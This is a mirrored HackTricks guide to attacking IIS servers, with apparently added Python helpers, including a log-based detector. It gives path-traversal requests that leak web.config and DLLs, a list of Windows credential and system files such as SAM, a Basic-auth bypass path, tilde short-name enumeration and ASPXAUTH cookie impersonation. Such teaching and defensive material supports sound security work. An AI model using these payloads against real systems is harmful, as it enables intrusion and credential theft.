mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-01 15:58:49 +00:00
371 lines
17 KiB
Markdown
# IIS - Internet Information Services
Test executable file extensions:

* asp
* aspx
* config
* php

## Internal IP Address disclosure

On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0; the Location header in the response may then point you to the internal IP address:

```
nc -v domain.com 80
openssl s_client -connect domain.com:443
```

Response disclosing the internal IP:

```
GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
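The check described above, written as an added example (this is not HackTricks code): it sends the bare `GET / HTTP/1.0` request with no Host header and reports a `Location` header that points at a private, loopback or link-local address. The target hostname and port are assumptions passed on the command line; the sample response embedded below is constructed from the one quoted above so the parser can be exercised offline.

```python
"""Added example (not HackTricks code): issue 'GET / HTTP/1.0' without a Host
header and flag a Location header that names an internal IP address."""
import ipaddress
import socket
import ssl
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample, copied from the response shown above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Cache-Control: no-cache\r\n"
    "Pragma: no-cache\r\n"
    "Location: https://192.168.5.237/owa/\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-FEServer: NHEXCHANGE2016\r\n"
    "\r\n"
)


def location_header(raw: str) -> Optional[str]:
    """Return the Location header value of a raw HTTP response, or None."""
    head = raw.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            return value.strip()
    return None


def disclosed_internal_ip(raw: str) -> Optional[str]:
    """Return the internal IP leaked in Location, or None.

    Only RFC 1918, loopback and link-local literals count; a Location that
    carries a hostname or a public address is not reported.
    """
    loc = location_header(raw)
    if not loc:
        return None
    host = urlsplit(loc).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # a hostname, not an IP literal
        return None
    return str(ip) if ip.is_private or ip.is_loopback or ip.is_link_local else None


def probe(host: str, port: int = 80, use_tls: bool = False, timeout: float = 5.0) -> str:
    """Send 'GET / HTTP/1.0' with no Host header and return the raw response."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False       # we only want the response, not trust
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(b"GET / HTTP/1.0\r\n\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None  # assumed hostname argument
    raw = probe(target, 443, use_tls=True) if target else SAMPLE_RESPONSE
    leaked = disclosed_internal_ip(raw)
    print(f"internal IP disclosed: {leaked}" if leaked else "no internal IP in Location")
```

Run it without arguments to see the parser work on the embedded sample; with a hostname it performs the real HTTP/1.0 probe over TLS. Treating only private-range literals as findings keeps a redirect to the public hostname from being reported as a disclosure.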

## Execute .config files

You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)

More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)

## IIS Discovery Bruteforce

Download the list that I have created:

{% file src="../../.gitbook/assets/iisfinal.txt" %}

It was created merging the contents of the following lists:

[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)

Use it without adding any extension; the files that need one already have it.

## Path Traversal

### Leaking source code

{% hint style="info" %}
As a summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where the executables are located** and download them.\
From the **downloaded DLLs** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\
Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.\
Reference: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% endhint %}

As with any .Net application, MVC applications have a **web.config** file, where "**assemblyIdentity**" XML tags identify every binary file the application uses.

```markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" />
  </configSections>
  <appSettings>
    <add key="webpages:Version" value="3.0.0.0" />
    <add key="webpages:Enabled" value="false" />
    <add key="ClientValidationEnabled" value="true" />
    <add key="UnobtrusiveJavaScriptEnabled" value="true" />
  </appSettings>
  <system.web>
    <authentication mode="None" />
    <compilation debug="true" targetFramework="4.6.1" />
    <httpRuntime targetFramework="4.6.1" />
  </system.web>
  <system.webServer>
    <modules>
      <remove name="FormsAuthentication" />
    </modules>
  </system.webServer>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin.Security" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin.Security.OAuth" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin.Security.Cookies" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Optimization" />
        <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="WebGrease" />
        <bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Helpers" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Mvc" />
        <bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.WebPages" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
```

In the previous output you can see references to several "**assemblyIdentity**" entries. These are files that may be located inside the /bin folder. For example: **/bin/WebGrease.dll**.

Other files that could be found in the root directory of a .Net application are **/global.asax**

```markup
<%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %>
```

And **/connectionstrings.config**

**Note: this file contains passwords!**

```markup
<connectionStrings>
    <add name="DefaultConnection" connectionString="Data Source=(LocalDb)\MSSQLLocalDB;AttachDbFilename [...]" providerName="System.Data.SqlClient" />
</connectionStrings>
```

#### Namespaces

In addition, .Net MVC applications are structured to define **other web.config files**, whose aim is to hold the namespace declarations for each set of view pages, relieving developers from declaring "@using" namespaces in every file.

```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0"?>
<configuration>
  <configSections>
    <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
      <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
      <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
    </sectionGroup>
  </configSections>
  <system.web.webPages.razor>
    <host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="System.Web.Mvc.Ajax" />
        <add namespace="System.Web.Mvc.Html" />
        <add namespace="System.Web.Optimization"/>
        <add namespace="System.Web.Routing" />
        <add namespace="WebApplication1" />
```

#### Downloading DLLs

From a previous response, the declaration of a **custom namespace** (since the other namespaces are defaults) suggests that a DLL called "**WebApplication1**" is present in the /bin directory.

```
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
[...]
```

From the previous output, inside the /bin directory you will also be able to find the DLLs

* System.Web.Mvc.dll
* System.Web.Mvc.Ajax.dll
* System.Web.Mvc.Html.dll
* System.Web.Optimization.dll
* System.Web.Routing.dll

Let's suppose that the previous DLL is importing a namespace called **WebApplication1.Areas.Minded**. An attacker can infer that other web.config files are present in the application, in guessable/default paths such as **/area-name/Views/**, containing specific configurations that may refer to other DLL files present in the /bin folder.

```markup
GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0"?>
<configuration>
  <configSections>
    <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
      <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
      <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
    </sectionGroup>
  </configSections>
  <system.web.webPages.razor>
    <host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="System.Web.Mvc.Ajax" />
        <add namespace="System.Web.Mvc.Html" />
        <add namespace="System.Web.Routing" />
        <add namespace="System.Web.Optimization" />
        <add namespace="WebApplication1" />
        <add namespace="WebApplication1.AdditionalFeatures" />
      </namespaces>
```

Note how in the previous output you can see a new namespace called **WebApplication1.AdditionalFeatures**, which indicates that there is another DLL in the /bin folder called **WebApplication1.AdditionalFeatures.dll**
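To make the inference in this section concrete, here is an added example (not HackTricks code, nor from the referenced blog) that parses the two kinds of web.config shown above and lists what a leaked copy reveals: the `assemblyIdentity` names from the root file, the non-framework namespaces from the Views file, the `/bin/<name>.dll` paths both imply, and the settings a reviewer would flag (`debug="true"`, the authentication mode). The XML snippets are constructed, trimmed copies of the excerpts on this page with closing tags added; the "custom namespace" heuristic (anything not under `System.` or `Microsoft.`) is an assumption of this example.

```python
"""Added example (not HackTricks code): what a leaked ASP.NET MVC web.config reveals."""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed, trimmed copy of the root web.config excerpt above (closing tags added).
ROOT_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <authentication mode="None" />
    <compilation debug="true" targetFramework="4.6.1" />
  </system.web>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin.Security" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="WebGrease" />
        <bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>
"""

# Constructed, trimmed copy of the Views/web.config excerpt above.
VIEWS_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web.webPages.razor>
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="System.Web.Optimization" />
        <add namespace="WebApplication1" />
        <add namespace="WebApplication1.AdditionalFeatures" />
      </namespaces>
    </pages>
  </system.web.webPages.razor>
</configuration>
"""

# Assumed heuristic: namespaces under these prefixes ship with the framework.
FRAMEWORK_PREFIXES = ("System.", "Microsoft.")


def assembly_identities(xml_text: str) -> List[str]:
    """Names of <assemblyIdentity> elements, whatever XML namespace they sit in."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [el.get("name") for el in root.iter()
            if el.tag.split("}")[-1] == "assemblyIdentity" and el.get("name")]


def declared_namespaces(xml_text: str) -> List[str]:
    """Values of <add namespace="..."/> entries."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [el.get("namespace") for el in root.iter("add") if el.get("namespace")]


def custom_namespaces(xml_text: str) -> List[str]:
    """Declared namespaces that are not framework defaults (prefix heuristic)."""
    return [ns for ns in declared_namespaces(xml_text) if not ns.startswith(FRAMEWORK_PREFIXES)]


def candidate_bin_dlls(root_config: str, views_config: str) -> List[str]:
    """Sorted, de-duplicated /bin/<name>.dll paths the two files point at."""
    names = set(assembly_identities(root_config)) | set(custom_namespaces(views_config))
    return sorted(f"/bin/{n}.dll" for n in names)


def risky_settings(root_config: str) -> Dict[str, str]:
    """Root web.config settings a reviewer would flag when the file is exposed."""
    root = ET.fromstring(root_config.encode("utf-8"))
    found: Dict[str, str] = {}
    comp = root.find("./system.web/compilation")
    if comp is not None and comp.get("debug", "").lower() == "true":
        found["compilation.debug"] = "true"   # verbose errors, symbol-rich builds
    auth = root.find("./system.web/authentication")
    if auth is not None:
        found["authentication.mode"] = auth.get("mode", "")
    return found


if __name__ == "__main__":
    for path in candidate_bin_dlls(ROOT_WEB_CONFIG, VIEWS_WEB_CONFIG):
        print(path)
    print(risky_settings(ROOT_WEB_CONFIG))
```

The `assemblyIdentity` lookup matches on the local tag name because the `<assemblyBinding>` element carries the `urn:schemas-microsoft-com:asm.v1` namespace, which a naive `root.iter("assemblyIdentity")` would miss.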

### Common files

From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)

```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
C:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```

## HTTPAPI 2.0 404 Error

If you see an error like the following one:

![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2).png>)

It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look at the served **SSL Certificate**, where you may find the domain/subdomain name. If it isn't there you may need to **brute force VHosts** until you find the correct one.

## Old IIS vulnerabilities worth looking for

### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure

You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\
The main limitation of this technique, if the server is vulnerable, is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files.
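The 6+3 limit comes from NTFS 8.3 short names, which is what the tilde technique queries. The following is an added example (not HackTricks code or the scanner's) that approximates the NTFS short-name rule so you can see what a given file name collapses to and which files become indistinguishable: collision suffixes (~1, ~2, ...) are assigned in list order here, whereas real NTFS switches to a hash-based form after a few collisions, which this example does not model. The file names are constructed from the ones appearing on this page.

```python
"""Added example (not HackTricks code): approximate NTFS 8.3 short-name generation."""
import re
from typing import Dict, List, Tuple

# Characters NTFS keeps in a short name; anything else becomes '_'.
_VALID_CHAR = re.compile(r"[A-Z0-9!#$%&'()\-@^_`{}~]")

# Constructed sample of names that appear on this page.
SAMPLE_NAMES = [
    "web.config", "Global.asax", "bin", "System.Web.Mvc.dll",
    "System.Web.Mvc.Ajax.dll", "WebApplication1.dll", ".htaccess",
]


def _clean(part: str) -> str:
    return "".join(c if _VALID_CHAR.fullmatch(c) else "_" for c in part)


def short_name(long_name: str, taken: Dict[Tuple[str, str], int]) -> str:
    """Return the 8.3 form of long_name, e.g. 'web.config' -> 'WEB~1.CON'.

    'taken' tracks (stem, ext) pairs already issued so collisions get ~2, ~3, ...
    A name that already satisfies 8.3 gets no separate short name and is
    returned upper-cased as-is.
    """
    name = long_name.upper()
    compact = name.replace(" ", "")          # spaces are dropped outright
    base, dot, ext = compact.rpartition(".")
    if not dot:                              # no extension at all
        base, ext = compact, ""
    elif not base:                           # leading dot only, e.g. '.htaccess'
        base, ext = ext, ""
    fits = (
        compact == name
        and name.count(".") <= 1
        and not name.startswith(".")
        and _clean(base) == base
        and _clean(ext) == ext
        and len(base) <= 8
        and len(ext) <= 3
    )
    if fits:
        return name
    stem = _clean(base.replace(".", ""))[:6]  # extra dots vanish before truncation
    ext3 = _clean(ext)[:3]
    n = taken.get((stem, ext3), 0) + 1
    taken[(stem, ext3)] = n
    return f"{stem}~{n}" + (f".{ext3}" if ext3 else "")


def short_names(names: List[str]) -> Dict[str, str]:
    """Map each long name to its short name, resolving collisions in list order."""
    taken: Dict[Tuple[str, str], int] = {}
    return {n: short_name(n, taken) for n in names}


def ambiguous_groups(names: List[str]) -> Dict[str, List[str]]:
    """Long names sharing one 6+3 prefix: the scanner cannot tell these apart."""
    groups: Dict[str, List[str]] = {}
    for long, short in short_names(names).items():
        if "~" in short:
            key = re.sub(r"~\d+", "~", short)  # collapse ~1/~2 into one bucket
            groups.setdefault(key, []).append(long)
    return {k: v for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    for long, short in short_names(SAMPLE_NAMES).items():
        print(f"{long:28} -> {short}")
    print(ambiguous_groups(SAMPLE_NAMES))
```

Two things the output makes visible: a name that already fits 8.3 (such as `bin`) has no tilde name and is therefore fully exposed, and sibling assemblies such as `System.Web.Mvc.dll` and `System.Web.Mvc.Ajax.dll` both reduce to `SYSTEM~N.DLL`, so the technique alone cannot recover which is which. Disabling 8.3 name creation on the volume (and stripping existing short names) is the server-side fix that removes the information this rule produces.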

You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability: `java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`

![](<../../.gitbook/assets/image (183).png>)

Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf)

You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`

### Basic Authentication bypass

**Bypass** a Basic authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php`

You can try to **mix** this **vulnerability** and the previous one to find new **folders** and **bypass** the authentication.

## ASP.NET Trace.AXD enabled debugging

ASP.NET includes a debugging mode, and its file is called `trace.axd`.

It keeps a very detailed log of all requests made to an application over a period of time.

This information includes remote client IPs, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.

[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)

![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
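On the detection side, the three probes described above (tilde short-name enumeration, the `:$i30:$INDEX_ALLOCATION` stream syntax from the Basic Authentication bypass section, and `trace.axd` access) all leave recognisable request paths in IIS logs. The following is an added example (not HackTricks code) that parses IIS W3C log lines and tags those requests per client. The log lines are constructed for illustration; the `#Fields:` layout is the IIS default W3C field set, and the wildcard request shapes are modelled on the paths quoted on this page rather than copied from any tool.

```python
"""Added example (not HackTricks code): tag suspicious requests in IIS W3C logs."""
import re
from collections import Counter
from typing import Dict, Iterable, List, Tuple
from urllib.parse import unquote

# Constructed sample log (IIS default W3C fields; User-Agent spaces are '+' in real logs).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 10:00:01 10.0.0.5 GET /index.aspx - 80 - 203.0.113.7 Mozilla/5.0 - 200 0 0 15
2024-05-01 10:00:02 10.0.0.5 GET /*~1*/a.aspx - 80 - 203.0.113.9 Java/1.8.0 - 404 0 0 3
2024-05-01 10:00:02 10.0.0.5 OPTIONS /w*~1*/a.aspx - 80 - 203.0.113.9 Java/1.8.0 - 400 0 0 2
2024-05-01 10:00:03 10.0.0.5 GET /trace.axd - 80 - 203.0.113.9 Mozilla/5.0 - 200 0 0 40
2024-05-01 10:00:04 10.0.0.5 GET /admin:$i30:$INDEX_ALLOCATION/admin.php - 80 - 203.0.113.9 Mozilla/5.0 - 200 0 0 12
2024-05-01 10:00:05 10.0.0.5 GET /Content/site.css - 80 - 203.0.113.7 Mozilla/5.0 - 200 0 0 4
"""

# (tag, pattern applied to the URL-decoded, lower-cased cs-uri-stem)
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # '*' next to '~N' is the short-name wildcard probe; a plain '/~user/' path is not flagged
    ("tilde-shortname-enum", re.compile(r"\*~|~\d+\*")),
    ("trace-axd-access", re.compile(r"(^|/)trace\.axd$")),
    ("ntfs-stream-syntax", re.compile(r":\$i30:|:\$index_allocation")),
]


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Turn W3C extended log lines into dicts keyed by the #Fields names."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split(" ")
        if len(values) == len(fields):  # drop malformed lines instead of misaligning columns
            rows.append(dict(zip(fields, values)))
    return rows


def classify(row: Dict[str, str]) -> List[str]:
    """Tags that apply to one request row."""
    stem = unquote(row.get("cs-uri-stem", "")).lower()
    return [tag for tag, rx in RULES if rx.search(stem)]


def findings(log_text: str) -> List[Tuple[str, str, str, str]]:
    """(client ip, tag, method, uri-stem) for every flagged row, in log order."""
    out: List[Tuple[str, str, str, str]] = []
    for row in parse_w3c(log_text.splitlines()):
        for tag in classify(row):
            out.append((row["c-ip"], tag, row["cs-method"], row["cs-uri-stem"]))
    return out


def by_client(log_text: str) -> Dict[str, int]:
    """Flagged-request count per client IP; a threshold on this drives an alert."""
    return dict(Counter(ip for ip, *_ in findings(log_text)))


if __name__ == "__main__":
    for ip, tag, method, stem in findings(SAMPLE_LOG):
        print(f"{ip:15} {tag:22} {method:7} {stem}")
    print(by_client(SAMPLE_LOG))
```

The tilde rule deliberately requires the `*` wildcard next to `~N`: a `~` alone occurs in legitimate paths, while IIS has no reason to see `*~1*` from a browser. Counting per client rather than per hit matters because the short-name scanner issues hundreds of such requests, mostly answered with 400/404, so the volume from one address is the signal.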

## ASPXAUTH Cookie

ASPXAUTH uses the following info:

* **`validationKey`** (string): hex-encoded key to use for signature validation.
* **`decryptionMethod`** (string): (default “AES”).
* **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros).
* **`decryptionKey`** (string): hex-encoded key to use for decryption.

However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to **use the cookie from the second server in the first one** and impersonate the user.\
This attack worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).